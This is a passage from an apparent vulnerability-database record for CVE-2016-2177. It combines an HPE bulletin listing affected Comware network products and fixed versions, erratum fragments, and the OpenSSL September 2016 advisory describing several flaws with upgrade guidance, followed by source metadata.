(CW7) Products See resolution section for impacted versions\n - HP Intelligent Management Center (iMC) See resolution section for\nimpacted versions\n - VCX Products 9.8.19\n\nBACKGROUND\n\n CVSS Base Metrics\n =================\n Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n CVE-2016-2177\n 7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nHPE has provided the following software updates to resolve the vulnerability\nin Comware 7, IMC PLAT, and VCX. \n\n**Note:** The following products are impacted by this issue\n\n**COMWARE 7 Products**\n\n + **12500 (Comware 7) - Version: R7377P02**\n * HPE Branded Products Impacted\n - JC072B HP 12500 Main Processing Unit\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n \n \n + **10500 (Comware 7) - Version: R7184**\n * HPE Branded Products Impacted\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG608A HP FlexFabric 11908-V Switch Chassis\n - JG609A HP FlexFabric 11900 Main Processing Unit\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n \n \n + **5900/5920 (Comware 7) - Version: R2432**\n * HPE Branded Products Impacted\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG296A HP 5920AF-24XG Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG555A HP 5920AF-24XG TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n \n \n + **MSR1000 (Comware 7) - Version: R0306P80**\n * HPE Branded Products Impacted\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n \n \n + **MSR2000 (Comware 7) - Version: R0306P80**\n * HPE Branded Products Impacted\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n \n \n + **MSR3000 (Comware 7) - Version: R0306P80**\n * HPE Branded Products Impacted\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n \n \n + **MSR4000 (Comware 7) - Version: R0306P80**\n * HPE Branded Products Impacted\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n \n \n + **VSR (Comware 7) - Version: E0324**\n * HPE Branded Products Impacted\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n \n \n + **7900 (Comware 7) - Version: R2152**\n * HPE Branded Products Impacted\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n \n \n + **5130EI (Comware 7) - Version: R3115P05**\n * HPE Branded Products Impacted\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n \n \n + **6125XLG - Version: R2432**\n * HPE Branded Products Impacted\n - 711307-B21 HP 6125XLG Blade Switch\n - 737230-B21 HP 6125XLG Blade Switch with TAA\n \n \n + **6127XLG - Version: R2432**\n * HPE Branded Products Impacted\n - 787635-B21 HP 6127XLG Blade Switch Opt Kit\n - 787635-B22 HP 6127XLG Blade Switch with TAA\n \n \n + **Moonshot - Version: R2432**\n * HPE Branded Products Impacted\n - 786617-B21 - HP Moonshot-45Gc Switch Module\n - 704654-B21 - HP Moonshot-45XGc Switch Module\n - 786619-B21 - HP Moonshot-180XGc Switch Module\n \n \n + **5700 (Comware 7) - Version: R2432**\n * HPE Branded Products Impacted\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n \n \n + **5930 (Comware 7) - Version: R2432**\n * HPE Branded Products Impacted\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n \n \n + **1950 (Comware 7) - Version: R3115P06**\n * HPE Branded Products Impacted\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n \n \n + **7500 (Comware 7) - Version: R7184**\n * HPE Branded Products Impacted\n - JD238C HP 7510 Switch Chassis\n - JD239C HP 7506 Switch Chassis\n - JD240C HP 7503 Switch Chassis\n - JD242C HP 7502 Switch Chassis\n - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n - JH208A HP 7502 Main Processing Unit\n - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n \n \n + **5510HI (Comware 7) - Version: R1121P01**\n * HPE Branded Products Impacted\n - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n \n \n + **5130HI (Comware 7) - Version: R1121P02**\n * HPE Branded Products Impacted\n - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n \n \n + **5940 (Comware 7) - Version: R2509P02**\n * HPE Branded Products Impacted\n - JH390A HPE FlexFabric 5940 48SFP+ 6QSFP28 Switch\n - JH391A HPE FlexFabric 5940 48XGT 6QSFP28 Switch\n - JH394A HPE FlexFabric 5940 48XGT 6QSFP+ Switch\n - JH395A HPE FlexFabric 5940 48SFP+ 6QSFP+ Switch\n - JH396A HPE FlexFabric 5940 32QSFP+ Switch\n - JH397A HPE FlexFabric 5940 2-slot Switch\n - JH398A HPE FlexFabric 5940 4-slot Switch\n \n \n + **5950 (Comware 7) - Version: R6123**\n * HPE Branded Products Impacted\n - JH321A HPE FlexFabric 5950 32QSFP28 Switch\n - JH402A HPE FlexFabric 5950 48SFP28 8QSFP28 Switch\n - JH404A HPE FlexFabric 5950 4-slot Switch\n \n \n + **12900E (Comware 7) - Version: R2609**\n * HPE Branded Products Impacted\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n \n \n + **iNode PC 7.2 (E0410) - Version: 7.2 E0410**\n * HPE Branded Products Impacted\n - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JD435A HP A-IMC Endpoint Admission Defense Client Software\n - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n \n \n + **iMC UAM_TAM 7.2-E0409 - Version: 7.2 E0409**\n * HPE Branded Products Impacted\n - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n \n \n + **VCX - Version: 9.8.19**\n * HPE Branded Products Impacted\n - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n - JC518A HP VCX Connect 200 Primry 120 G6 Server\n - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n - JE341A HP VCX Connect 100 Secondary\n - JE252A HP VCX Connect Primary MIM Module\n - JE253A HP VCX Connect Secondary MIM Module\n - JE254A HP VCX Branch MIM Module\n - JE355A HP VCX V6000 Branch Platform 9.0\n - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n - JD023A HP MSR30-40 Router with VCX MIM Module\n - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n - JE340A HP VCX Connect 100 Pri Server 9.0\n - JE342A HP VCX Connect 100 Sec Server 9.0\n \n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 1 August 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. (CVE-2016-6808)\n\n* A memory leak flaw was fixed in expat. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). JIRA issues fixed (https://issues.jboss.org/):\n\nJBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0]\nJBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service\n\n6. (CVE-2016-2177)\n\nIt was discovered that OpenSSL did not properly handle Montgomery\nmultiplication, resulting in incorrect results leading to transient\nfailures. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2177" }, { "db": "JVNDB", "id": "JVNDB-2016-003304" }, { "db": "BID", "id": "91319" }, { "db": "VULMON", "id": "CVE-2016-2177" }, { "db": "PACKETSTORM", "id": "140717" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "143628" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "PACKETSTORM", "id": "140850" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2177", "trust": 3.0 }, { "db": "ICS CERT", "id": "ICSA-18-144-01", "trust": 1.9 }, { "db": "MCAFEE", "id": "SB10165", "trust": 1.4 }, { "db": "BID", "id": "91319", "trust": 1.4 }, { "db": "SECTRACK", "id": "1036088", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/06/08/9", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10215", "trust": 1.1 }, { "db": "SCHNEIDER", "id": "SEVD-2018-144-01", "trust": 1.1 }, { "db": "SCHNEIDER", "id": 